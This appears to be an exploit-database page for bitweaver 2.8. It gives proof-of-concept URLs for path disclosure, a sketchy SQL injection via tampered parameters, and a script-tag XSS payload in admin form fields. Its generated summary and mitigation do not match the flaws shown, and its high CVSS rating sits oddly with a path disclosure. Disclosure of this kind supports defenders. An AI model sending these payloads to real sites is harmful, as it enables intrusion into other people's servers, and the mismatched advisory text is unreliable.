Path Disclosure bitweaver 2.8

vendor:

bitweaver

by:

lemlajt

8.8

CVSS

HIGH

Path Disclosure

200

CWE

Product Name: bitweaver

Affected Version From: 2.8

Affected Version To: 2.8

Patch Exists: NO

Related CWE: N/A

CPE: a:bitweaver:bitweaver:2.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2011

Path Disclosure bitweaver 2.8

Path Disclosure vulnerability in bitweaver 2.8 allows an attacker to view the directory structure of the web server. This vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable server. The PoC provided in the text can be used to exploit this vulnerability.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web server is configured to not allow directory listing. Additionally, the web server should be configured to not allow access to sensitive files and directories.

Source

Exploit-DB raw data:

# exploit title: Path Disclosure bitweaver 2.8
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve :
#

Path Disclosure bitweaver 2.8
PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27

sql injection in bitweaver 2.8
PoC :
1. Goto:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Data Tamper:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =


bonus: xss
POST
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>

# *